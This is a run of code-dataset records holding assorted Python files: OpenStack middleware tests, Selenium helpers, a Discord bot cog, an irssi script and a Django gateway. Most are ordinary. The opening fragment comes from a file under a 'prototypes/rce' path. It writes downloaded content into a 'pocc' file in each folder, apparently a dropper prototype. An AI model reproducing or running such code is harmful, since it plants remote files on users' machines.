open(f\"{f}\\\\pocc.{file2_ext}\", 'wb').write(url_file2)", "repo_name": "Spaceish/swap-base", "sub_path": "prototypes/rce/startup.py", "file_name": "startup.py", "file_ext": "py", "file_size_in_byte": 1275, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.system", "line_number": 15, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "9244753554", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom oslo_config import fixture as cfg_fixture\nfrom oslo_messaging import conffixture as msg_fixture\nfrom oslotest import createfile\nimport webob.dec\n\nfrom keystonemiddleware import audit\nfrom keystonemiddleware.tests.unit import utils\n\n\naudit_map_content = \"\"\"\n[custom_actions]\nreboot = start/reboot\nos-migrations/get = read\n\n[path_keywords]\naction = None\nos-hosts = host\nos-migrations = None\nreboot = None\nservers = server\n\n[service_endpoints]\ncompute = service/compute\n\"\"\"\n\n\nclass BaseAuditMiddlewareTest(utils.MiddlewareTestCase):\n PROJECT_NAME = 'keystonemiddleware'\n\n def setUp(self):\n super(BaseAuditMiddlewareTest, self).setUp()\n\n self.audit_map_file_fixture = self.useFixture(\n createfile.CreateFileWithContent('audit', audit_map_content))\n\n self.cfg = self.useFixture(cfg_fixture.Config())\n self.msg = self.useFixture(msg_fixture.ConfFixture(self.cfg.conf))\n\n self.cfg.conf([], project=self.PROJECT_NAME)\n\n def create_middleware(self, cb, **kwargs):\n\n @webob.dec.wsgify\n def _do_cb(req):\n return cb(req)\n\n kwargs.setdefault('audit_map_file', self.audit_map)\n kwargs.setdefault('service_name', 'pycadf')\n\n return audit.AuditMiddleware(_do_cb, **kwargs)\n\n @property\n def audit_map(self):\n return self.audit_map_file_fixture.path\n\n @staticmethod\n def get_environ_header(req_type=None):\n env_headers = {'HTTP_X_SERVICE_CATALOG':\n '''[{\"endpoints_links\": [],\n \"endpoints\": [{\"adminURL\":\n \"http://admin_host:8774\",\n \"region\": \"RegionOne\",\n \"publicURL\":\n \"http://public_host:8774\",\n \"internalURL\":\n \"http://internal_host:8774\",\n \"id\": \"resource_id\"}],\n \"type\": \"compute\",\n \"name\": \"nova\"}]''',\n 'HTTP_X_USER_ID': 'user_id',\n 'HTTP_X_USER_NAME': 'user_name',\n 'HTTP_X_AUTH_TOKEN': 'token',\n 'HTTP_X_PROJECT_ID': 'tenant_id',\n 'HTTP_X_IDENTITY_STATUS': 'Confirmed'}\n if req_type:\n env_headers['REQUEST_METHOD'] = req_type\n return env_headers\n", "repo_name": "openstack/keystonemiddleware", "sub_path": "keystonemiddleware/tests/unit/audit/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 3049, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 65, "dataset": "github-code", "pt": "41", "api": [{"api_name": "keystonemiddleware.tests.unit.utils.MiddlewareTestCase", "line_number": 40, "usage_type": "attribute"}, {"api_name": "keystonemiddleware.tests.unit.utils", "line_number": 40, "usage_type": "name"}, {"api_name": "oslotest.createfile.CreateFileWithContent", "line_number": 47, "usage_type": "call"}, {"api_name": "oslotest.createfile", "line_number": 47, "usage_type": "name"}, {"api_name": "oslo_config.fixture.Config", "line_number": 49, "usage_type": "call"}, {"api_name": "oslo_config.fixture", "line_number": 49, "usage_type": "name"}, {"api_name": "oslo_messaging.conffixture.ConfFixture", "line_number": 50, "usage_type": "call"}, {"api_name": "oslo_messaging.conffixture", "line_number": 50, "usage_type": "name"}, {"api_name": "webob.dec.dec", "line_number": 56, "usage_type": "attribute"}, {"api_name": "webob.dec", "line_number": 56, "usage_type": "name"}, {"api_name": "keystonemiddleware.audit.AuditMiddleware", "line_number": 63, "usage_type": "call"}, {"api_name": "keystonemiddleware.audit", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "22147876639", "text": "# -*- coding: UTF-8 -*-\n'''\n操作日期控件,常用方法封装\n'''\n\nfrom utils.selenium_util import 
FIND_ELEMENT_METHOD, wait_for_element_show\n\ndef specify_datepicker_by_remove_attr(browser, input_name, year, month, day):\n    '''\n    WdatePicker widget:\n    remove the readonly attribute and type the value in directly\n    '''\n    browser.execute_script(\"$('input[name=%s]').removeAttr('readonly')\" % input_name)\n    browser.find_element_by_name(input_name).send_keys('%s-%s-%s' % (day, month, year))\n\ndef specify_datepicker_by_run_script(browser, year, month, day):\n    '''\n    WdatePicker widget:\n    call the WdatePicker JS directly\n    '''\n    browser.switch_to.default_content()\n    datepicker_iframe = browser.find_element_by_xpath(\"//iframe[contains(@src,'about:blank')]\")\n    browser.switch_to.frame(datepicker_iframe)\n    wait_for_element_show(browser, FIND_ELEMENT_METHOD.XPATH, \"//div[@class='WdateDiv']\")\n    browser.execute_script('day_Click(' + '%s,%s,%s' % (year, month, day) + ')')\n\ndef specify_datepicker_as_today(browser):\n    '''\n    WdatePicker widget:\n    pick today's date\n    '''\n    browser.switch_to.default_content()\n    datepicker_iframe = browser.find_element_by_xpath(\"//iframe[contains(@src,'about:blank')]\")\n    browser.switch_to.frame(datepicker_iframe)\n    wait_for_element_show(browser, FIND_ELEMENT_METHOD.XPATH, \"//div[@class='WdateDiv']\")\n    browser.find_element_by_id('dpOkInput').click()\n\ndef specify_datepicker_by_go_through(browser, year, month, day):\n    '''\n    WdatePicker widget:\n    pick the value by walking the day elements\n    '''\n    browser.switch_to.default_content()\n    datepicker_iframe = browser.find_element_by_xpath(\"//iframe[contains(@src,'about:blank')]\")\n    browser.switch_to.frame(datepicker_iframe)\n    wait_for_element_show(browser, FIND_ELEMENT_METHOD.XPATH, \"//div[@class='WdateDiv']\")\n    browser.find_element_by_xpath(\"//td[@onclick='day_Click(%s,%s,%s);']\" % (year, month, day)).click()", "repo_name": "dennyx/ui-bdd", "sub_path": "utils/datepicker_util.py", "file_name": "datepicker_util.py", "file_ext": "py", "file_size_in_byte": 1914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "utils.selenium_util.wait_for_element_show", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD.XPATH", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.selenium_util.wait_for_element_show", "line_number": 35, "usage_type": "call"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD.XPATH", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.selenium_util.wait_for_element_show", "line_number": 46, "usage_type": "call"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD.XPATH", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.selenium_util.FIND_ELEMENT_METHOD", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "72523630204", "text": "import torch\r\nimport torch.nn as nn\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef compute_precision_recall(targets, predictions):\r\n    num_hit = len(set(predictions).intersection(set(targets)))\r\n    precision = float(num_hit) / len(predictions)\r\n    recall = float(num_hit) / len(targets)\r\n    return precision, recall\r\n\r\n\r\n\r\ndef compute_map(targets, predictions, k):\r\n    if len(predictions) > k:\r\n        predictions = predictions[:k]\r\n\r\n    score = 0.0\r\n    num_hits = 0.0\r\n    for i, p in enumerate(predictions):\r\n        if p in targets and p not in predictions[:i]:\r\n            num_hits += 1.0\r\n            score += num_hits / (i + 1.0)\r\n    
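# an empty target list would make average precision undefined, so fall back to 0.0\r\n    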
if not list(targets):\r\n return 0.0\r\n\r\n return score / min(len(targets), k)\r\n\r\n\r\nfile1=open('predict.txt','w+')\r\n\r\ndef predict(model,test_input,test_data,usernotInteract,k_list):\r\n total_precision = [0]*len(k_list)\r\n total_recall = [0]*len(k_list)\r\n total_map = list()\r\n file1.write('#####################################################\\n')\r\n for u in range(1,len(test_input)):\r\n input = torch.from_numpy(np.asarray(test_input[u]))\r\n #print(input.size())\r\n output = -model(input).squeeze(1).cpu().numpy().flatten()\r\n pred_ind = output.argsort()\r\n predictions = [test_input[u][index][1] for index in pred_ind] #each data in test_input[u]: [u, i, user_seq, item_seq]\r\n predictions_copy = [str(s) for s in predictions[:20]]\r\n ss = str(u)+\":\"+\" \".join(predictions_copy)+'\\n'\r\n\r\n file1.write(ss)\r\n tes= [str(s) for s in test_data[u]]\r\n\r\n ta = str(u)+\":\"+\" \".join(tes)+'\\n'\r\n\r\n file1.write(ta)\r\n\r\n\r\n\r\n #print(i,output.size())\r\n for j in range(len(k_list)):\r\n precision, recall = compute_precision_recall(test_data[u], predictions[:k_list[j]])\r\n total_precision[j] += precision\r\n total_recall[j] += recall\r\n total_map.append(compute_map(test_data[u], predictions, k=np.inf))\r\n\r\n return total_precision,total_recall,total_map\r\n\r\n\r\n\r\n", "repo_name": "chenqijason/DACNN", "sub_path": "predictFun.py", "file_name": "predictFun.py", "file_ext": "py", "file_size_in_byte": 2039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.from_numpy", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "41456029517", "text": "import asyncio\nimport aiohttp\nimport pprint\n\n\nasync def download_json_data(url : str, session : aiohttp.ClientSession):\n async with session.get(url) as response:\n print(\"here\")\n data = await response.json()\n print(data['img'])\n\n\n\nasync def download_kcd_metadata(sites : list):\n async with aiohttp.ClientSession() as session:\n tasks = []\n for url in sites:\n task = asyncio.create_task(download_json_data(url, session)) \n tasks.append(task)\n\n await asyncio.gather(*tasks, return_exceptions=True) \n\n\nif __name__==\"__main__\":\n sites = [f\"https://xkcd.com/{i+1}/info.0.json\" for i in range(1)]\n asyncio.get_event_loop().run_until_complete(download_kcd_metadata(sites))\n", "repo_name": "petreleven/code_adventure", "sub_path": "experiment.py", "file_name": "experiment.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "aiohttp.ClientSession", "line_number": 6, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 15, "usage_type": "call"}, {"api_name": "asyncio.create_task", "line_number": 18, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "32398446943", "text": "import discord\nfrom discord.ext import commands\nfrom discord.ext.commands.cooldowns import BucketType\nfrom PIL import Image\n\nclass Avatar(commands.Cog):\n \n def __init__(self, client):\n self.client = client\n\n # Command to display a user's avatar\n @commands.command()\n @commands.cooldown(1, 2, BucketType.user)\n 
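# the cooldown above limits this command to one call per user every 2 seconds\n    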
async def avatar(self, ctx, *, member: discord.Member = None):\n \n # If no member is provided, default to the command author\n target_member = member or ctx.author\n \n embed = discord.Embed(title=f\"{target_member.name}'s Avatar\", colour=0x12ba01)\n f = discord.File(\"Avatar.png\", filename=\"avatar.png\")\n embed.set_image(url=f\"attachment://avatar.png\")\n await ctx.send(file=f, embed=embed)\n\n # Command to equip an accessory to an avatar\n @commands.command()\n async def equip(self, ctx, accessory=None):\n if accessory is None:\n return await ctx.send(\"Pick an accessory to equip\")\n\n # Equip a hat to the avatar\n if accessory == \"hat\":\n filename = 'Hat.png'\n hat_image = Image.open(filename, 'r')\n \n filename1 = 'Avatar.png'\n avatar_bg = Image.open(filename1, 'r')\n \n # Composite the avatar and the hat\n text_img = Image.new('RGBA', (800, 600), (0, 0, 0, 0))\n text_img.paste(avatar_bg, (0, 0))\n text_img.paste(hat_image, (170, -185), mask=hat_image)\n \n text_img.save(\"ball.png\", format=\"png\")\n\n # Send the updated avatar\n avatar = discord.File(\"ball.png\", filename=\"avatar.png\")\n embed = discord.Embed(title=f\"{ctx.author.name}'s Avatar\")\n embed.set_image(url=f\"attachment://avatar.png\")\n await ctx.send(file=avatar, embed=embed)\n\n# Setup function to add the cog\ndef setup(client):\n client.add_cog(Avatar(client))\n", "repo_name": "Kartikinator/Vitality", "sub_path": "Cogs/avatar.py", "file_name": "avatar.py", "file_ext": "py", "file_size_in_byte": 1928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 6, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 6, "usage_type": "name"}, {"api_name": "discord.Member", "line_number": 14, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 19, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 20, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 12, "usage_type": "name"}, {"api_name": "discord.ext.commands.cooldown", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "discord.ext.commands.cooldowns.BucketType.user", "line_number": 13, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.cooldowns.BucketType", "line_number": 13, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "discord.File", "line_number": 46, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 47, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 25, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "13921654882", "text": "from typing import List\nfrom typing import TextIO\n\n\nclass Data:\n def __init__(self, parseString: str) -> None:\n super().__init__()\n fields: List['str'] = parseString.split(\";\")\n self.versenyzo: str = fields[0]\n 
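# remaining semicolon-separated fields: bib number, category, race time, distance percentage\n        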
self.rajtszam: int = int(fields[1])\n        self.kategoria: str = fields[2]\n        self.versenyido: str = fields[3]\n        self.tavszazalek: int = int(fields[4])\n\n    def __str__(self) -> str:\n        return \"versenyzo = {v}; rajtszam = {r}; kategoria = {k}; versenyido = {vi}; tavszazalek = {t}\".format(v=self.versenyzo, r=self.rajtszam, k=self.kategoria, vi=self.versenyido, t=self.tavszazalek)\n\n\nclass Read:\n    def __init__(self) -> None:\n        super().__init__()\n        f: TextIO = open(\"!_Specifikacio/ub2017egyeni.txt\", \"r\")\n        content: str = f.read()\n        lines: List['str'] = content.split(sep=\"\\n\")\n        datalist: List['Data'] = list()\n        for i in range(1, len(lines)):\n            d = Data(lines[i])\n            datalist.append(d)\n        #3.feladat\n        print(\"3. feladat: Egyéni indulók: {db} fő \".format(db=len(datalist)))\n\n        #4.feladat\n        nok: int = 0\n        noi: str = \"Noi\"\n        for i in range(len(datalist)):  # datalist holds only data rows, so start at index 0\n            if datalist[i].kategoria == noi and datalist[i].tavszazalek == 100:\n                nok += 1\n        print(\"4. feladat: Célba érkező női sportolók száma: {nok} fő\".format(nok=nok))\n\n        #5.feladat\n        vnev = input(\"5.feladat: Kérem a sportoló nevét: \")\n        van: str = \"Nem\"\n        tav: str = \"Nem\"\n        for x in range(len(datalist)):\n            if datalist[x].versenyzo == vnev:\n                van = \"Igen\"\n            if datalist[x].tavszazalek == 100 and datalist[x].versenyzo == vnev:\n                tav = \"Igen\"\n        print(\"Indult egyéniben a sportoló? {van}\".format(van=van))\n        print(\"Teljesítette a teljes távot? {tav}\".format(tav=tav))\n\n        # #6.feladat\n        # for c in range(1, len(datalist)):\n        #     cella: datalist[c].versenyido['str'] = parseString.split(\":\")\n        #     self.ora:int = int(cella[1])\n        #     self.perc:int = int(cella[2])\n        #     self.masodperc:int = int(cella[3])\n        #     print(self.ora)\n        #\n        # def __str__(self) -> str:\n        #     return \"ora = {o}; perc = {p}; masodperc = {mp}\".format(o=self.ora, p=self.perc, mp=self.masodperc)\n        #\n        #\n        #\n        # #7.feladat\n        # tferfiak: int = 0\n        # ferfi: str = \"Ferfi\"\n        # for z in range(1, len(datalist)):\n        #     if datalist[z].kategoria == ferfi and datalist[x].tavszazalek == 100:\n        #         tferfiak += 1\n        # teljesferfiatlag = tferfiak /\n        # print(teljesferfiatlag)\n\n        # #8.feladat\n        # minferfi\n        # minno\n\nRead()", "repo_name": "csany2020c/MyGame", "sub_path": "File/3_feladat/horvathboldizsar.py", 
+ urllib.urlencode(dict(\n method='user.getrecenttracks',\n user=username,\n api_key=api_key,\n limit='1')))\n tree = objectify.parse(url)\n assert tree.getroot().get('status') == 'ok'\n track = tree.xpath('/lfm/recenttracks/track')[0]\n parts_dict = {}\n for part in parts:\n if part == 'date':\n if track.get('nowplaying') == 'true':\n value = u''\n else:\n tt = time.localtime(int(track.date.get('uts')))\n value = time.strftime(lastfm_strftime, tt).decode(\n irssi_encoding)\n else:\n value = unicode(getattr(track, part, u''))\n parts_dict[part] = value\n print (\n lastfm_output.decode(irssi_encoding) % parts_dict\n ).encode(irssi_encoding)\n\ndef do_now_playing(data, server, witem):\n def on_result(pid, status):\n if not os.WIFEXITED(status):\n sys.stderr.write('child %d exited abnormally: status %d\\n' % (\n pid, status))\n return\n stdout, stderr = proc.stdout.read(), proc.stderr.read()\n if os.WEXITSTATUS(status):\n irssi.prnt(stderr.rstrip())\n elif irssi.settings_get_bool('lastfm_use_action'):\n witem.command('me %s' % stdout.rstrip())\n else:\n witem.command('say %s' % stdout.rstrip())\n username = data or irssi.settings_get_str('lastfm_user')\n irssi_encoding = irssi.settings_get_str('term_charset')\n lastfm_strftime = irssi.settings_get_str('lastfm_strftime')\n lastfm_output = irssi.settings_get_str('lastfm_output')\n proc = subprocess.Popen([\n sys.executable, __file__, \n username, irssi_encoding, lastfm_strftime, lastfm_output],\n stdin=open(os.devnull), stdout=subprocess.PIPE, stderr=subprocess.PIPE, \n close_fds=True)\n glib.child_watch_add(proc.pid, on_result)\n\nif __name__ == '__main__':\n lastfm_lookup()\nelse:\n import irssi\n irssi.settings_add_str('lastfm', 'lastfm_user', '')\n irssi.settings_add_str('lastfm', 'lastfm_output', \n 'np: %(artist)s-%(name)s')\n irssi.settings_add_str('lastfm', 'lastfm_output_tab_complete', '')\n irssi.settings_add_str('lastfm', 'lastfm_strftime', 'scrobbled at: %R %Z')\n irssi.settings_add_bool('lastfm', 'lastfm_use_action', 0)\n irssi.settings_add_bool('lastfm', 'lastfm_get_player', 0)\n irssi.command_bind('np', do_now_playing)\n", "repo_name": "habnabit/dotfiles", "sub_path": "irssi/scripts/lastfm.py", "file_name": "lastfm.py", "file_ext": "py", "file_size_in_byte": 2843, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "urlparse.urljoin", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 17, "usage_type": "call"}, {"api_name": "lxml.objectify.parse", "line_number": 22, "usage_type": "call"}, {"api_name": "lxml.objectify", "line_number": 22, "usage_type": "name"}, {"api_name": "time.localtime", "line_number": 31, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 32, "usage_type": "call"}, {"api_name": "os.WIFEXITED", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.WEXITSTATUS", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.devnull", "line_number": 61, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 61, "usage_type": "attribute"}, {"api_name": "glib.child_watch_add", "line_number": 
63, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 69, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 70, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 72, "usage_type": "call"}, {"api_name": "irssi.settings_add_str", "line_number": 73, "usage_type": "call"}, {"api_name": "irssi.settings_add_bool", "line_number": 74, "usage_type": "call"}, {"api_name": "irssi.settings_add_bool", "line_number": 75, "usage_type": "call"}, {"api_name": "irssi.command_bind", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "72872289083", "text": "# -*- coding: utf-8 -*-\nimport os\nfrom time import sleep\nimport time\nfrom random import randint\nimport modules.config as con\n\n\n# work with OS\ndef end():\n print('Сыграем ещё?:', end=' ')\n \n stat = input().lower()\n if stat == 'да':\n os.system('cls')\n os.system('run.bat')\n elif stat == 'нет':\n print('Тогда пока!')\n sleep(1)\n path_parent = os.getcwd()\n os.system(path_parent + \"/exit.bat\")\n\n else:\n print(con.name + ', я тебя не понял!(((')\n end()\n\ndef recording():\n coins = 0\n if con.d == 'легкая' and con.status == 'Win':\n coins = 10\n elif con.d == 'средняя' and con.status == 'Win':\n coins = 20\n elif con.d == 'тяжелая' and con.status == 'Win':\n coins = 60\n bcoins = str(bin(coins))\n idp = str(randint(400000, 900000))\n fud = 'user_data.txt'\n f = open(fud, 'w')\n f.write(\"Game over in \" + t + \"\\n\")\n f.write(\"ID player: \" + idp + \"\\n\")\n f.write(\"Your name: \" + con.name + \"\\n\")\n f.write(\"Chosen difficulty: \" + con.d + \"\\n\")\n f.write(\"Game result: \" + con.status + \"\\n\")\n if con.d == 'песочница':\n f = open(fud, 'a')\n f.write(\"Cheats: \" + con.cheats + \"\\n\")\n f.write(\"Coins: \" + bcoins + \"\\n\")\n f.close()\n\ndef statistic():\n global t\n t = time.asctime(time.localtime(time.time()))\n print('Хотите просмотреть свою статистику по текущей игре?:', end=' ')\n stat = input().lower()\n if stat == 'да':\n recording()\n os.system('run_file.bat')\n os.system('CLS')\n end()\n elif stat == 'нет':\n os.system('CLS')\n end()\n else:\n print(con.name + ', я тебя не понял!(((')\n print()\n statistic()\n", "repo_name": "ilyazheprog/game_num", "sub_path": "modules/work_with_OS.py", "file_name": "work_with_OS.py", "file_ext": "py", "file_size_in_byte": 1845, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.system", "line_number": 15, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 20, "usage_type": "call"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}, {"api_name": "modules.config.name", "line_number": 24, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 24, "usage_type": "name"}, {"api_name": "modules.config.d", "line_number": 29, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 29, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 29, "usage_type": "attribute"}, {"api_name": "modules.config.d", "line_number": 31, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 31, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 31, "usage_type": "attribute"}, {"api_name": "modules.config.d", "line_number": 33, "usage_type": "attribute"}, {"api_name": 
"modules.config", "line_number": 33, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "modules.config.name", "line_number": 41, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 41, "usage_type": "name"}, {"api_name": "modules.config.d", "line_number": 42, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 42, "usage_type": "name"}, {"api_name": "modules.config.status", "line_number": 43, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 43, "usage_type": "name"}, {"api_name": "modules.config.d", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.config.cheats", "line_number": 46, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 46, "usage_type": "name"}, {"api_name": "time.asctime", "line_number": 52, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 52, "usage_type": "call"}, {"api_name": "os.system", "line_number": 57, "usage_type": "call"}, {"api_name": "os.system", "line_number": 58, "usage_type": "call"}, {"api_name": "os.system", "line_number": 61, "usage_type": "call"}, {"api_name": "modules.config.name", "line_number": 64, "usage_type": "attribute"}, {"api_name": "modules.config", "line_number": 64, "usage_type": "name"}]} +{"seq_id": "37241025395", "text": "from rest_framework.exceptions import ValidationError\nfrom ..models.banner import Banner\nfrom ..serializers.banner import BannerSerializer\nfrom ..constants import BANNER_DOES_NOT_EXIST\nfrom ..utils.paginate import paginate_queryset\n\n\ndef list_banner(\n is_active=True,\n area_id=None,\n page=1,\n page_size=10,\n ordering=None,\n search=None,\n):\n banner = Banner.objects.all().filter(is_deleted=False)\n if is_active is not None:\n banner = banner.filter(is_active=is_active)\n if area_id is not None:\n banner = banner.filter(area_id=area_id)\n if search:\n banner = banner.filter(area__name__icontains=search)\n if not ordering:\n ordering = \"sequence\"\n banner = banner.order_by(ordering)\n data = paginate_queryset(queryset=banner, page=page, page_size=page_size)\n # serializers = BannerSerializer(data.get(\"results\"), many=True)\n # data[\"results\"] = serializers.data\n return data\n\n\ndef create_banner(data):\n banner = Banner.objects.create(**data)\n # serializers = BannerSerializer(banner)\n # return serializers.data\n return banner\n\n\ndef update_banner(pk, data):\n try:\n banner = Banner.objects.filter(is_deleted=False).get(id=pk)\n data.pop(\"image\")\n serializers = BannerSerializer(banner, data)\n if serializers.is_valid(raise_exception=True):\n kwargs = {}\n if data.get(\"area\", {}):\n kwargs[\"area_id\"] = data.get(\"area\").get(\"id\")\n serializers.save(**kwargs)\n # return serializers.data\n return banner\n except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n\n\ndef get_banner(pk):\n try:\n banner = Banner.objects.filter(is_deleted=False, is_active=True).get(\n id=pk\n )\n # serializers = BannerSerializer(banner)\n # return serializers.data\n return banner\n except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n\n\ndef delete_banner(pk):\n try:\n banner = Banner.objects.filter(is_deleted=False).get(pk=pk)\n return banner.delete()\n 
except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n\n\ndef upload_image(pk, image_data):\n try:\n banner = Banner.objects.filter(is_deleted=False).get(id=pk)\n banner.image_data = image_data\n banner.save()\n # serializers = BannerSerializer(banner)\n # return serializers.data\n return banner\n except Banner.DoesNotExist:\n raise ValidationError(detail=BANNER_DOES_NOT_EXIST)\n", "repo_name": "mycity360-project/mycity360-backend", "sub_path": "backend/backend/gateways/banner.py", "file_name": "banner.py", "file_ext": "py", "file_size_in_byte": 2599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.banner.Banner.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 16, "usage_type": "name"}, {"api_name": "utils.paginate.paginate_queryset", "line_number": 26, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects.create", "line_number": 33, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 33, "usage_type": "name"}, {"api_name": "models.banner.Banner.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "models.banner.Banner.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 41, "usage_type": "name"}, {"api_name": "serializers.banner", "line_number": 43, "usage_type": "name"}, {"api_name": "serializers.banner.BannerSerializer", "line_number": 43, "usage_type": "call"}, {"api_name": "serializers.banner.is_valid", "line_number": 44, "usage_type": "call"}, {"api_name": "serializers.banner", "line_number": 44, "usage_type": "name"}, {"api_name": "serializers.banner.save", "line_number": 48, "usage_type": "call"}, {"api_name": "serializers.banner", "line_number": 48, "usage_type": "name"}, {"api_name": "models.banner.Banner.DoesNotExist", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.banner.Banner", "line_number": 51, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 52, "usage_type": "call"}, {"api_name": "constants.BANNER_DOES_NOT_EXIST", "line_number": 52, "usage_type": "name"}, {"api_name": 